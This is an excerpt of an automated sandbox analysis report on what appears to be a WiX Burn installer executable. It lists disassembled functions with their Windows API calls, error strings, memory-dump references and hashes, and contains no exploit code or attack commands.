                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareString$lstrlen
                                                                                                                                                                    • String ID: algorithm$apuputil.cpp$digest$http://appsyndication.org/2006/appsyn$md5$msi.dll$name$sha1$sha256
                                                                                                                                                                    • API String ID: 1657112622-2492263259
                                                                                                                                                                    • Opcode ID: c11f90b80bbf1a6b41521d9437e93ccde69e6d6c1dd9461f0e351290f92d32a7
                                                                                                                                                                    • Instruction ID: 2dcd2f671cb6c3c67ba74b08fa7af93888cfc17fb59ecc5daf4f14841e1f7eb6
                                                                                                                                                                    • Opcode Fuzzy Hash: c11f90b80bbf1a6b41521d9437e93ccde69e6d6c1dd9461f0e351290f92d32a7
                                                                                                                                                                    • Instruction Fuzzy Hash: 8051B43165C612BBDB204F94CC45F6ABB66EB15B30F204715FA34AE2E1CBA5EC44D790
                                                                                                                                                                    Function 0090A03E Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 215COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 0090A0B6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Open@16
                                                                                                                                                                    • String ID: AssignmentType$Failed to change value type.$Failed to copy upgrade code.$Failed to enumerate related products for upgrade code.$Failed to format GUID string.$Failed to get product info.$Failed to set variable.$Language$MsiProductSearch failed: ID '%ls', HRESULT 0x%x$Product or related product not found: %ls$State$Trying per-machine extended info for property '%ls' for product: %ls$Trying per-user extended info for property '%ls' for product: %ls$Unsupported product search type: %u$VersionString
                                                                                                                                                                    • API String ID: 3613110473-2134270738
                                                                                                                                                                    • Opcode ID: 9a02de9fa8f64272f2dae7469970e4be4fa493f942c3225c8240d469da717611
                                                                                                                                                                    • Instruction ID: ea7557b588c6c6cbb580afb9faeb5810031d67f0e16e9af74443eafc0a653a30
                                                                                                                                                                    • Opcode Fuzzy Hash: 9a02de9fa8f64272f2dae7469970e4be4fa493f942c3225c8240d469da717611
                                                                                                                                                                    • Instruction Fuzzy Hash: C661E432D40318BFCB219AA8CD85EAE7BB8FB85714F204165F914BB2D1C236DE5097D2
                                                                                                                                                                    Function 00914B2A Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 158sleepfileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?), ref: 00914B84
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00914B92
                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00914BB6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateErrorFileLastSleep
                                                                                                                                                                    • String ID: Failed to allocate name of parent cache pipe.$Failed to allocate name of parent pipe.$Failed to open companion process with PID: %u$Failed to open parent pipe: %ls$Failed to verify parent pipe: %ls$\\.\pipe\%ls$\\.\pipe\%ls.Cache$feclient.dll$pipe.cpp
                                                                                                                                                                    • API String ID: 408151869-3212458075
                                                                                                                                                                    • Opcode ID: a7d1f883fa84d229d0aef9a0ca37775b7d927a871e94705382dbe47a36b96a1e
                                                                                                                                                                    • Instruction ID: f81f9b64f77a50d9dadb60c6b2185891542dce778f8dfd4a31b3c49f400bc121
                                                                                                                                                                    • Opcode Fuzzy Hash: a7d1f883fa84d229d0aef9a0ca37775b7d927a871e94705382dbe47a36b96a1e
                                                                                                                                                                    • Instruction Fuzzy Hash: 94416B36F8663ABBDB2157A08D06FDE7A68AF18725F110221FE10BB1D0D774DD8096D4
                                                                                                                                                                    Function 0090F585 Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 152registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,009104DF,InstallerVersion,InstallerVersion,00000000,009104DF,InstallerName,InstallerName,00000000,009104DF,Date,InstalledDate,00000000,009104DF,LogonUser), ref: 0090F733
                                                                                                                                                                      • Part of subcall function 009414F4: RegSetValueExW.ADVAPI32(00020006,00950D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0090F335,00000000,?,00020006), ref: 00941527
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseValue
                                                                                                                                                                    • String ID: Date$Failed to create the key for update registration.$Failed to get the formatted key path for update registration.$Failed to write %ls value.$InstalledBy$InstalledDate$InstallerName$InstallerVersion$LogonUser$PackageName$PackageVersion$Publisher$PublishingGroup$ReleaseType$ThisVersionInstalled
                                                                                                                                                                    • API String ID: 3132538880-2703781546
                                                                                                                                                                    • Opcode ID: 569549a8cdfe75165f35a7b4578259d6a330945831775448cf70478b89e2f5b8
                                                                                                                                                                    • Instruction ID: 44f846a290ed246890b483c3a635205b91a3983b3f989fdf63b6c4773a2a0ea6
                                                                                                                                                                    • Opcode Fuzzy Hash: 569549a8cdfe75165f35a7b4578259d6a330945831775448cf70478b89e2f5b8
                                                                                                                                                                    • Instruction Fuzzy Hash: D4410832A85669BFCF33D655CC12EAF7A29AB91B19F100170FD00B66E2C7719F14A781
                                                                                                                                                                    Function 0091E7B4 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 137registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • TlsSetValue.KERNEL32(?,?), ref: 0091E7FF
                                                                                                                                                                    • RegisterClassW.USER32(?), ref: 0091E82B
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0091E836
                                                                                                                                                                    • CreateWindowExW.USER32(00000080,00959E54,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 0091E89D
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0091E8A7
                                                                                                                                                                    • UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 0091E945
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
                                                                                                                                                                    • String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
                                                                                                                                                                    • API String ID: 213125376-288575659
                                                                                                                                                                    • Opcode ID: 627a11783776a29f2a8b01d7a95a66baab00ecf08629acc755b63acf455e3fd9
                                                                                                                                                                    • Instruction ID: 6d00cc7d5c1d761a3af0cb9d21750ebfe519c1c46fc2a3a3f3c3ffb354f515de
                                                                                                                                                                    • Opcode Fuzzy Hash: 627a11783776a29f2a8b01d7a95a66baab00ecf08629acc755b63acf455e3fd9
                                                                                                                                                                    • Instruction Fuzzy Hash: 9041A276A01229EBDB208FA5DC49FDEBFB8EF09760F104165FD15AB190D730A9449BA0
                                                                                                                                                                    Function 0092C774 Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 272COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to copy uninstall arguments for passthrough bundle package, xrefs: 0092CAAC
                                                                                                                                                                    • Failed to copy local source path for passthrough pseudo bundle., xrefs: 0092C9B7
                                                                                                                                                                    • Failed to copy key for passthrough pseudo bundle payload., xrefs: 0092C9C5
                                                                                                                                                                    • Failed to copy download source for passthrough pseudo bundle., xrefs: 0092C98F
                                                                                                                                                                    • Failed to allocate space for burn payload inside of related bundle struct, xrefs: 0092C9E7
                                                                                                                                                                    • Failed to copy related arguments for passthrough bundle package, xrefs: 0092CA82
                                                                                                                                                                    • pseudobundle.cpp, xrefs: 0092C7A8, 0092C9A1, 0092C9DB
                                                                                                                                                                    • Failed to copy filename for passthrough pseudo bundle., xrefs: 0092C9BE
                                                                                                                                                                    • Failed to copy cache id for passthrough pseudo bundle., xrefs: 0092CA05
                                                                                                                                                                    • Failed to recreate command-line arguments., xrefs: 0092CA43
                                                                                                                                                                    • Failed to allocate memory for pseudo bundle payload hash., xrefs: 0092C9AD
                                                                                                                                                                    • Failed to copy install arguments for passthrough bundle package, xrefs: 0092CA62
                                                                                                                                                                    • Failed to copy key for passthrough pseudo bundle., xrefs: 0092C988
                                                                                                                                                                    • Failed to allocate space for burn package payload inside of passthrough bundle., xrefs: 0092C7B4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocateProcess
                                                                                                                                                                    • String ID: Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of passthrough bundle.$Failed to allocate space for burn payload inside of related bundle struct$Failed to copy cache id for passthrough pseudo bundle.$Failed to copy download source for passthrough pseudo bundle.$Failed to copy filename for passthrough pseudo bundle.$Failed to copy install arguments for passthrough bundle package$Failed to copy key for passthrough pseudo bundle payload.$Failed to copy key for passthrough pseudo bundle.$Failed to copy local source path for passthrough pseudo bundle.$Failed to copy related arguments for passthrough bundle package$Failed to copy uninstall arguments for passthrough bundle package$Failed to recreate command-line arguments.$pseudobundle.cpp
                                                                                                                                                                    • API String ID: 1357844191-115096447
                                                                                                                                                                    • Opcode ID: e77893782a2bc0dde0d761b3bf8924d7fd39e4cf2cb8ee1bc81e8907f03af8b4
                                                                                                                                                                    • Instruction ID: 731f03779dca8de5c9cfbb4af313cee3efb66b0edb077050601d62d2684dc53a
                                                                                                                                                                    • Opcode Fuzzy Hash: e77893782a2bc0dde0d761b3bf8924d7fd39e4cf2cb8ee1bc81e8907f03af8b4
                                                                                                                                                                    • Instruction Fuzzy Hash: EDB18A75A00626EFCB12CF28C881F5ABBE5BF48314F118169FD18AB395CB31E851DB80
                                                                                                                                                                    Function 0092DE46 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 204stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 0092DE61
                                                                                                                                                                    Strings
                                                                                                                                                                    • Invalid BITS engine URL: %ls, xrefs: 0092DE83
                                                                                                                                                                    • bitsengine.cpp, xrefs: 0092DE77, 0092DF6A
                                                                                                                                                                    • Failed to download BITS job., xrefs: 0092DFF8
                                                                                                                                                                    • Failed to create BITS job., xrefs: 0092DEF0
                                                                                                                                                                    • Failed to set credentials for BITS job., xrefs: 0092DF0F
                                                                                                                                                                    • Failed to set callback interface for BITS job., xrefs: 0092DF99
                                                                                                                                                                    • Failed to add file to BITS job., xrefs: 0092DF2E
                                                                                                                                                                    • Failed while waiting for BITS download., xrefs: 0092E012
                                                                                                                                                                    • Falied to start BITS job., xrefs: 0092E019
                                                                                                                                                                    • Failed to copy download URL., xrefs: 0092DEA8
                                                                                                                                                                    • Failed to create BITS job callback., xrefs: 0092DF74
                                                                                                                                                                    • Failed to complete BITS job., xrefs: 0092E00B
                                                                                                                                                                    • Failed to initialize BITS job callback., xrefs: 0092DF82
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrlen
                                                                                                                                                                    • String ID: Failed to add file to BITS job.$Failed to complete BITS job.$Failed to copy download URL.$Failed to create BITS job callback.$Failed to create BITS job.$Failed to download BITS job.$Failed to initialize BITS job callback.$Failed to set callback interface for BITS job.$Failed to set credentials for BITS job.$Failed while waiting for BITS download.$Falied to start BITS job.$Invalid BITS engine URL: %ls$bitsengine.cpp
                                                                                                                                                                    • API String ID: 1659193697-2382896028
                                                                                                                                                                    • Opcode ID: cf1adf6012ebe4133f39a018d3172ca2e568220b8db42364fc38763c0a93e489
                                                                                                                                                                    • Instruction ID: 7faad8a0df983f1665aa98073c5af9a8169c6457f986facc028fd9d2838f5d90
                                                                                                                                                                    • Opcode Fuzzy Hash: cf1adf6012ebe4133f39a018d3172ca2e568220b8db42364fc38763c0a93e489
                                                                                                                                                                    • Instruction Fuzzy Hash: 60612731A45235EFCB119F94E9C5EAE7BB8EF88720B114146FC04AF259D7B5DD019B80
                                                                                                                                                                    Function 0090BC93 Relevance: 26.4, APIs: 6, Strings: 9, Instructions: 190processCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 0090BCE5
                                                                                                                                                                    • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000200,00000000,?,00000044,?,?,?,?,?), ref: 0090BDF2
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 0090BDFC
                                                                                                                                                                    • WaitForInputIdle.USER32(?,?), ref: 0090BE50
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?), ref: 0090BE9B
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?), ref: 0090BEA8
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandle$CreateErrorIdleInputLastOpen@16ProcessWait
                                                                                                                                                                    • String ID: "%ls"$"%ls" %s$D$Failed to CreateProcess on path: %ls$Failed to create executable command.$Failed to create obfuscated executable command.$Failed to format argument string.$Failed to format obfuscated argument string.$approvedexe.cpp
                                                                                                                                                                    • API String ID: 155678114-2737401750
                                                                                                                                                                    • Opcode ID: 0a62279f393b070fb5d50fb6440b283dbfec4ed545b9b1575a3424b76ed2d086
                                                                                                                                                                    • Instruction ID: 68e48679de82b9cd0af0ca5577ccda34a14f52b8b11c3cf1b1602280cac93885
                                                                                                                                                                    • Opcode Fuzzy Hash: 0a62279f393b070fb5d50fb6440b283dbfec4ed545b9b1575a3424b76ed2d086
                                                                                                                                                                    • Instruction Fuzzy Hash: 80515872D0061ABFCF11AFE4CC46EEEBB79BF44710B114566FA14B61A1E7319E109B90
                                                                                                                                                                    Function 009269D2 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 153serviceCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,00000000,?,?,?,?,?,?,?,?,00926F28,?), ref: 00926A0B
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00926F28,?,?,?), ref: 00926A18
                                                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,wuauserv,00000027,?,?,?,?,?,?,?,?,00926F28,?,?,?), ref: 00926A60
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00926F28,?,?,?), ref: 00926A6C
                                                                                                                                                                    • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,00926F28,?,?,?), ref: 00926AA6
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00926F28,?,?,?), ref: 00926AB0
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00926B67
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(?), ref: 00926B71
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Service$ErrorLast$CloseHandleOpen$ManagerQueryStatus
                                                                                                                                                                    • String ID: Failed to mark WU service to start on demand.$Failed to open WU service.$Failed to open service control manager.$Failed to query status of WU service.$Failed to read configuration for WU service.$msuengine.cpp$wuauserv
                                                                                                                                                                    • API String ID: 971853308-301359130
                                                                                                                                                                    • Opcode ID: ff0f49ab7a9d309a256752996ffbf0f18bf3207dd6f7c8307f37c02a8c44a6a7
                                                                                                                                                                    • Instruction ID: a5a1b70d916207cb807a654d39439b13a2a0a39248d8495778edd47dadbf2924
                                                                                                                                                                    • Opcode Fuzzy Hash: ff0f49ab7a9d309a256752996ffbf0f18bf3207dd6f7c8307f37c02a8c44a6a7
                                                                                                                                                                    • Instruction Fuzzy Hash: 3541F276E45339ABC720DFA9AC85EAFB7A8AB84711F018424FD01FB645D774DC048AA0
                                                                                                                                                                    Function 0090A28B Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 138registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 0090A2B3
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 0090A30E
                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(000002C0,00000100,00000000,000002C0,00000000,00000000,000002C0,?,00000100,00000000,?,00000000,?,000002C0,000002C0,?), ref: 0090A32F
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000100,00000000,000002C0,00000100,00000000,000002C0), ref: 0090A405
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to query registry key value., xrefs: 0090A36A
                                                                                                                                                                    • Registry key not found. Key = '%ls', xrefs: 0090A396
                                                                                                                                                                    • Failed to format key string., xrefs: 0090A2BE
                                                                                                                                                                    • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 0090A37A
                                                                                                                                                                    • RegistrySearchExists failed: ID '%ls', HRESULT 0x%x, xrefs: 0090A3DD
                                                                                                                                                                    • Failed to format value string., xrefs: 0090A319
                                                                                                                                                                    • search.cpp, xrefs: 0090A360
                                                                                                                                                                    • Failed to set variable., xrefs: 0090A3BD
                                                                                                                                                                    • Failed to open registry key. Key = '%ls', xrefs: 0090A3C7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Open@16$CloseQueryValue
                                                                                                                                                                    • String ID: Failed to format key string.$Failed to format value string.$Failed to open registry key. Key = '%ls'$Failed to query registry key value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchExists failed: ID '%ls', HRESULT 0x%x$search.cpp
                                                                                                                                                                    • API String ID: 2702208347-46557908
                                                                                                                                                                    • Opcode ID: 88bbabb7e65a31b559065f2afb8917b6fe9d2cfaa5c61b2252ed642a1f6f59e8
                                                                                                                                                                    • Instruction ID: d1096674461af5c3213f15e8f9d71ecb8fe9e793fecbaf0c427851125c9d8bb5
                                                                                                                                                                    • Opcode Fuzzy Hash: 88bbabb7e65a31b559065f2afb8917b6fe9d2cfaa5c61b2252ed642a1f6f59e8
                                                                                                                                                                    • Instruction Fuzzy Hash: A541A832D40228BFDF129BA4CC46FAEBB69EB84710F114265FD14B61D2D7719E10A7D2
                                                                                                                                                                    Function 0090B208 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 137COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?,0090BAFB,00000008,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B210
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090BAFB,00000008,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B21C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorHandleLastModule
                                                                                                                                                                    • String ID: .wix$.wixburn$Bundle guid didn't match the guid in the PE Header in memory.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get module handle to process.$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$burn$section.cpp
                                                                                                                                                                    • API String ID: 4242514867-926796631
                                                                                                                                                                    • Opcode ID: 6d25cbcf93654eac8edcc5e7958e73479259c71837d4447d46538d9cb9db888a
                                                                                                                                                                    • Instruction ID: 91e7fa026d24c8bc96e34ebba6bb171d1fec2191ab026d2fdf49ad4792a666c9
                                                                                                                                                                    • Opcode Fuzzy Hash: 6d25cbcf93654eac8edcc5e7958e73479259c71837d4447d46538d9cb9db888a
                                                                                                                                                                    • Instruction Fuzzy Hash: E0414A36281321AFCB301A569C4AF6F2258FFD5B35B358469F9115F1C2D7B9CC0282E9
                                                                                                                                                                    Function 0090694B Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 133libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,ntdll,?), ref: 0090699B
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009069A5
                                                                                                                                                                    • GetProcAddress.KERNEL32(?,RtlGetVersion), ref: 009069E8
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009069F2
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,?), ref: 00906B03
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$AddressFreeHandleLibraryModuleProc
